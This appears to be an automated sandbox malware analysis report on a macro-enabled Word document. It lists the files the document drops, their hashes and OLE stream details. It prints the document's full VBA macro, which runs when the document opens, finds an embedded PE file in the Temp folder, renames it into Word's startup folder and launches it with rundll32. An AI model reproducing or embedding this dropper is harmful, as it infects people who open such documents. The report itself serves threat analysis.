                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Dec 21 09:39:48 2022, mtime=Wed Apr 26 09:38:59 2023, atime=Wed Apr 26 09:38:57 2023, length=1335808, window=hide
                        Category:dropped
                        Size (bytes):554
                        Entropy (8bit):4.726239534145845
                        Encrypted:false
                        SSDEEP:6:4xtQl3Zf9nZyZlcWxf8eYKKTKtSs0ljsljAlCYeSRR6QNcdnWkSsNSt4WTeHvGm2:8q9ccG8eZK2tSs0OjAB8Qqt/SsjOm2
                        MD5:07B91F9AB086D369710C8D30BC4F0194
                        SHA1:6AB2EDD5B2D7F144349FDA1D3CDA0240CC7D1994
                        SHA-256:7FE18AD5CE1723B06CA61449E6DA821F6D401AFEB8822FBA15AFD06A8B576E42
                        SHA-512:87238ABE74A61DC60AC898FC88E435F68969DE09B8F0BB53D518FE6C4104207B486EDAA90DA5C446AC27B9C5B002EEABB0CB66F62D8EC7B46F1A86E3BC9D2F79
                        Malicious:false
                        Preview:L..................F.... ....)m.(.....yO+x..J..N+x...b......................|.z.2..b...V.T .0524_4~1.DOC..^......U.T.V.T.....a......................u.0.5.2.4._.4.1.0.9.3.9.9.7.2.8.2.1.8...d.o.c.......[...............-.......Z...........;S.......C:\Users\user\Desktop\0524_4109399728218.doc..-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.0.5.2.4._.4.1.0.9.3.9.9.7.2.8.2.1.8...d.o.c.`.......X.......965543..........N...n..O...}R...)oS.............N...n..O...}R...)oS.............E.......9...1SPS..mD..pH.H@..=x.....h....H....F.5./EG.gM.U..............
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Generic INItialization configuration [doc]
                        Category:dropped
                        Size (bytes):87
                        Entropy (8bit):4.759959123148596
                        Encrypted:false
                        SSDEEP:3:bDuMJlHRUXk+nzCmX1VS6RUXk+nzCv:bCwN0m6N0I
                        MD5:5AC6F8EBDB7ECEF9C42F1864228BBBF6
                        SHA1:AC4F7FB5B560B4B353D3F278C31045406026CBED
                        SHA-256:2234E04482CDF8404F30044193B6E41D04B6CAC61491243D8C09B2931932F579
                        SHA-512:C12ACA40CE733B6A194DA61CC8498F51EC9B2851F316CFF304DC1BD120BC363298DBE2A6F2FFAEC359BC8216B4A7808FF82E0C633E798AAA40A975D05248BFA9
                        Malicious:false
                        Preview:[folders]..Templates.LNK=0..0524_4109399728218.LNK=0..[doc]..0524_4109399728218.LNK=0..
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.8648381951210884
                        Encrypted:false
                        SSDEEP:3:El//ePXln3/t/p1XlPlv//las9/ep//Xn:Et2pFH//laaeR/Xn
                        MD5:F10CD438C28AF029EDD0E98E50A9F47C
                        SHA1:28AEFDB9B72D7130CDC12F27907FE460A6D8AC01
                        SHA-256:281E44D55F3BA6200BB93DAC6AE5A8BDA8D2FD4C72D731F75D89C87765872854
                        SHA-512:B343DE68FD7D1792D2593F272E17DBC2ADE03C322D7627A5604926272266984045D92460581E377069ED1E580A317653EB3D45362A66C76F76E0FBBF3BF74705
                        Malicious:false
                        Preview:.user...................................................e.y.u.p...............................+4......................?K......K.)..S..|s.5...O.,O+x..........n...
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):14
                        Entropy (8bit):2.699513850319966
                        Encrypted:false
                        SSDEEP:3:QARG:QAc
                        MD5:09B7FD4F63059FB967C6CF0D36AF99A4
                        SHA1:BDFABECF4B7BB2A0A08C69150C770C45C5A81303
                        SHA-256:AF2F74E5947D19590946BA404ED7FBEBF59A85BBF83354E24015FA9729A2808C
                        SHA-512:AEAC2A4520FD462248176C30E094269F6A285E1ADF731912E62E24B88EA792E2E42E92498FA944F677AC84758C41DFEA044216A96F6FD204E8CEC82E42351B4E
                        Malicious:false
                        Preview:..e.y.u.p.....
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):12
                        Entropy (8bit):0.41381685030363374
                        Encrypted:false
                        SSDEEP:3:/l:
                        MD5:E4A1661C2C886EBB688DEC494532431C
                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                        Malicious:false
                        Preview:............
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.07294752550309
                        Encrypted:false
                        SSDEEP:3:El//ePXlnwwU1lPlvllQjQ91Yn:Et22YjQ3Yn
                        MD5:1F35E41D38ED6B6B483EB427B8F8041C
                        SHA1:D2396977E17674119B9FACAF398949A8DC6965E5
                        SHA-256:9CA98F6B3C9BBBDA83CFB9A557F736CCAB09D6EAA9A5522D0178879822DE181F
                        SHA-512:3C1527917C23720DBD5D2E74AD1E7749E34C3FAD55C096429B542C0B506D6C7893CB06E17DC10F1075DBF646166B92A385CFA8BF67315672159E0C22410D7977
                        Malicious:false
                        Preview:.user...................................................e.y.u.p...............@J....@J.....4.........................................5...................n...
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):720896
                        Entropy (8bit):6.648944468588579
                        Encrypted:false
                        SSDEEP:12288:uC69N9C/hMHx8kzFfagPtKEp6E72y/N0hwOGt+gBd8x+6vLrD1ag:HKHaY8k5faaboEy6r8zz1
                        MD5:9DC6F214FC82D637DE2F68F3C519D339
                        SHA1:AAA425F7377D405BEA59B8ADFB65AFC0C8869886
                        SHA-256:2A8B737A4752060A308C4312B7C0CF6C05CDE5B370906286DEA9CDD36F5AA613
                        SHA-512:5CB0A6F3AB48E5127D5C9F638C035DD4B3A97F3EB31334D5BC3EEAFC164B31540FEA65D6E40ABFAC8566676C43E954F567DBC2AF81A629B4059AF7E466D75BEF
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 77%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................H#.......0....@..........................@...............................................`..J$...@..............................................................................................................CODE....h........................... ..`DATA.........0......................@...BSS.....%....P.......0...................idata..J$...`...&...0..............@....reloc...............V..............@..P.rsrc........@......................@..P.............@......................@..P........................................................................................................................................................................................................................
                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: MyPc, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 24 13:32:00 2021, Last Saved Time/Date: Mon May 24 13:32:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
                        Entropy (8bit):7.39501459276194
                        TrID:
                        • Microsoft Word document (32009/1) 54.23%
                        • Microsoft Word document (old ver.) (19008/1) 32.20%
                        • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                        File name:0524_4109399728218.doc
                        File size:1335808
                        MD5:14f4c470c207e22c3b0a4efa7b4200e8
                        SHA1:21180195396580a9ade32b589490cf3bc94d3b5b
                        SHA256:0b22278ddb598d63f07eb983bcf307e0852cd3005c5bc15d4a4f26455562c8ec
                        SHA512:4adc4275a9105bf94bdce4b9d5821026d99a4adf16579b1b2b23495efbd55cc7bc90a129248a9902c7c75828eac9ac665c8a34c203b428748d9f7b8a80b76823
                        SSDEEP:24576:nEIjrPUaphvGvGUZ93/semhXp7AsWIKHaY8k5faaboEy6r8zz1:n/jhvGvGU93097AFIKbv0WY/1
                        TLSH:4955D022F2A1CC37C177167D9C2BA6E85839BE113A28AD473BE43D0C5F397817925297
                        File Content Preview:........................>.......................`...........l...............W...X...Y...Z...[...\...]...^..._...o...p...q...r...s...t...u...v...w...x...y......................................................................................................
                        Icon Hash:74f4e4c4cac4c4d4
                        Document Type:OLE
                        Number of OLE Files:1
                        Has Summary Info:
                        Application Name:Microsoft Office Word
                        Encrypted Document:False
                        Contains Word Document Stream:True
                        Contains Workbook/Book Stream:False
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:True
                        Flash Objects Count:0
                        Contains VBA Macros:True
                        Code Page:1252
                        Title:
                        Subject:
                        Author:
                        Keywords:
                        Comments:
                        Template:
                        Last Saved By:
                        Revision Number:2
                        Total Edit Time:0
                        Create Time:2021-05-24 12:32:00
                        Last Saved Time:2021-05-24 12:32:00
                        Number of Pages:1
                        Number of Words:3
                        Number of Characters:21
                        Creating Application:
                        Security:0
                        Document Code Page:1252
                        Number of Lines:1
                        Number of Paragraphs:1
                        Thumbnail Scaling Desired:False
                        Company:
                        Contains Dirty Links:False
                        Shared Document:False
                        Changed Hyperlinks:False
                        Application Version:1048576
                        General
                        Stream Path:Macros/VBA/ThisDocument
                        VBA File Name:ThisDocument.cls
                        Stream Size:4635
                        Data ASCII:. . . . . . . . . . . . . . . b . . . 0 . . . > . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . . . . . . . x . . . ( j . . H . G . _ o M q ' T . @ # . . . . . . . . . . . . . . . . . . . . . . G j g . M c s _ . . . . . . . . . . . . . . . . . . . . . . x . . . . G j g . M c s _ ( j . . H . G . _ o M q . . . . M E . . . . . . . . . . . . . . . . . . . . . P . . . . . . S " . . . . S . . . . . S " . . . . > " . . . . . . . . . . . . . . . . L . . . . . L . . . . . . . . . . . . . . . . . < X . . .
                        Data Raw:01 16 03 00 06 00 01 00 00 8c 07 00 00 e4 00 00 00 62 02 00 00 30 08 00 00 3e 08 00 00 ca 0e 00 00 03 00 00 00 01 00 00 00 a6 0d 29 99 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 78 00 ff ff 00 00 28 6a c7 0e 1c 48 18 47 b8 0c 5f c2 6f 4d c3 71 f6 e7 27 e7 54 e8 03 40 bb b1 23 f4 0c 03 b4 e1 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Attribute VB_Name = "ThisDocument"
                        Attribute VB_Base = "1Normal.ThisDocument"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = True
                        Attribute VB_Customizable = True
                        Option Compare Text
                        Option Explicit
                        Dim pafs As String
                        
                        Private Sub Document_Open()
                        Dim uis As String
                        uis = Options.DefaultFilePath(wdStartupPath)
                        If Dir(uis & "\ket.t") = "" Then
                        Call yyy
                        
                        Call xxx
                        
                        If pafs = "" Then
                        
                        Else
                        Dim iel As String
                        Dim ued As String
                        ued = ".exe"
                        iel = Options.DefaultFilePath(wdStartupPath)
                        Name pafs As iel & "\ket.t"
                        Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX")
                        End If
                        End If
                        End Sub
                        Sub xxx()
                        
                         Dim FSO As Object
                           Set FSO = CreateObject("Scripting.FileSystemObject")
                        Search FSO.GetFolder(Options.DefaultFilePath(wdTempFilePath))
                        End Sub
                        Sub yyy()
                          Selection.MoveDown Unit:=wdLine, Count:=3
                            Selection.MoveRight Unit:=wdCharacter, Count:=2
                            Selection.MoveDown Unit:=wdLine, Count:=3
                            Selection.MoveRight Unit:=wdCharacter, Count:=2
                            Selection.TypeBackspace
                            Selection.Copy
                        End Sub
                        
                         
                         Sub Search(mds As Object)
                         Dim Mysob As Object
                         Dim Fil As Object
                          
                           For Each Mysob In mds.SubFolders
                             Search Mysob
                           Next Mysob
                           For Each Fil In mds.Files
                           
                           If Fil.Name = "jax.k" Then
                               
                                pafs = Fil
                                End If
                           Next Fil
                           Exit Sub
                        ErrHandle:
                           
                           Err.Clear
                        End Sub
                        
                        
                        
                        

                        General
                        Stream Path:\x1CompObj
                        File Type:data
                        Stream Size:114
                        Entropy:4.235956365095031
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                        General
                        Stream Path:\x5DocumentSummaryInformation
                        File Type:data
                        Stream Size:280
                        Entropy:2.376563663955734
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                        General
                        Stream Path:\x5SummaryInformation
                        File Type:data
                        Stream Size:412
                        Entropy:3.0880592875478543
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M y P c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
                        General
                        Stream Path:1Table
                        File Type:ARC archive data, crunched
                        Stream Size:8500
                        Entropy:6.043049243175421
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                        Data Raw:1a 06 0f 00 12 00 01 00 77 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                        General
                        Stream Path:Data
                        File Type:dBase III DBT, version number 0, next free block index 564728, 1st item "\317iSv\357\252\322zW\304\227\2712v\346\3162\335\247O\027\326\333\035\025\031\336\273\265\323<\2726\272$I\222$I\222$I\222$I\222$I\036$;UO\222$I\222$I\222$I\222$I\222\344\001\222\002\300$I\222$I\222$I\222$I\222$y\300\244"
                        Stream Size:566201
                        Entropy:7.972171141321045
                        Base64 Encoded:True
                        Data ASCII:. . D . d . . . . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . V . . . . . . . . y . e . r . . . P . i . c . t . u . r . e . . 6 . 5 . 7 . . . C . : . \\ . U . s . e . r . s . \\ . M . y . P . c . \\ . D . e . s . k . t . o . p . \\ . B . u . i . l . d . e . r . _ . v . 6 . 6 . 7 . \\ . y . e . r . . . p . n . g . . . . . " . . . . .
                        Data Raw:f8 9d 08 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 4a df 2e e7 01 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 de 00 00 00 b2 04 0a f0 08 00 00 00 92 06 00 00 00 0a 00 00 93 00 0b f0 ac 00 00 00 7f 00 80 00 f9 01 04 41 02 00 00 00 05 c1 08 00 00 00 3f 01 00 00 06 00 bf 01 00 00
                        General
                        Stream Path:Macros/PROJECT
                        File Type:ASCII text, with CRLF line terminators
                        Stream Size:373
                        Entropy:5.3516482740641385
                        Base64 Encoded:True
                        Data ASCII:I D = " { D 2 A E 2 D D C - 3 2 0 0 - 4 E 4 F - B 6 A 9 - E D 7 0 5 E 1 D A 0 6 3 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 5 9 7 9 D 7 5 6 D 5 B 7 1 5 B 7 1 5 B 7 1 5 B 7 1 " . . D P B = " 7 F 7 D 7 7 6 F 8 B B 3 7 4 B 4 7 4 B 4 7 4 " . . G C = " 6 9 6 B 6 1 7 2 6 2 7 2 6 2 8 D " . . . . [ H o s t E x t e n d e r I n f o ]
                        Data Raw:49 44 3d 22 7b 44 32 41 45 32 44 44 43 2d 33 32 30 30 2d 34 45 34 46 2d 42 36 41 39 2d 45 44 37 30 35 45 31 44 41 30 36 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                        General
                        Stream Path:Macros/PROJECTwm
                        File Type:data
                        Stream Size:41
                        Entropy:3.0773844850752607
                        Base64 Encoded:False
                        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                        General
                        Stream Path:Macros/VBA/_VBA_PROJECT
                        File Type:data
                        Stream Size:2749
                        Entropy:4.365097759876284
                        Base64 Encoded:False
                        Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
                        Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                        General
                        Stream Path:Macros/VBA/__SRP_0
                        File Type:data
                        Stream Size:2199
                        Entropy:3.4656679441809715
                        Base64 Encoded:False
                        Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ F . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . ; a d 6 J U w j .
                        Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 40 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                        General
                        Stream Path:Macros/VBA/__SRP_1
                        File Type:data
                        Stream Size:193
                        Entropy:1.7281568400588385
                        Base64 Encoded:False
                        Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m d s ^ . . . . . . . . . . . . . . .
                        Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00
                        General
                        Stream Path:Macros/VBA/__SRP_2
                        File Type:data
                        Stream Size:1707
                        Entropy:2.995684462157246
                        Base64 Encoded:False
                        Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . A . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . .
                        Data Raw:72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 04 00 04 00 0d 00 00 00 d1 09 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 c1 0d 00 00 00 00 00 00 00 00
                        General
                        Stream Path:Macros/VBA/__SRP_3
                        File Type:data
                        Stream Size:322
                        Entropy:2.171223118059142
                        Base64 Encoded:False
                        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . 8 . ! . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . @ . ! . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . \\ . . . . . . . . . b . . . . . . . . . . . . . . .
                        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 80 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 18 0e 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                        General
                        Stream Path:Macros/VBA/dir
                        File Type:data
                        Stream Size:514
                        Entropy:6.261052462586738
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . 3 b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . 9 m . . A ! O f f i c g O D . f . i . c g . .
                        Data Raw:01 fe b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 8a 33 a0 62 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                        General
                        Stream Path:ObjectPool/_1683339676/\x1CompObj
                        File Type:data
                        Stream Size:76
                        Entropy:3.093449526469053
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . 9 q . . . . . . . . . . . .
                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                        General
                        Stream Path:ObjectPool/_1683339676/\x1Ole10Native
                        File Type:data
                        Stream Size:721178
                        Entropy:6.6488088153470475
                        Base64 Encoded:True
                        Data ASCII:. . . . . . j a x . k . C : \\ U s e r s \\ M y P c \\ D e s k t o p \\ B u i l d e r _ v 6 6 7 \\ j a x . k . . . . . ' . . . C : \\ U s e r s \\ M y P c \\ A p p D a t a \\ L o c a l \\ T e m p \\ j a x . k . . . . . M Z P . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . L ! T h i s p r o g r a m m u s t b e r u n u n d e r W i n 3 2 . . $ 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
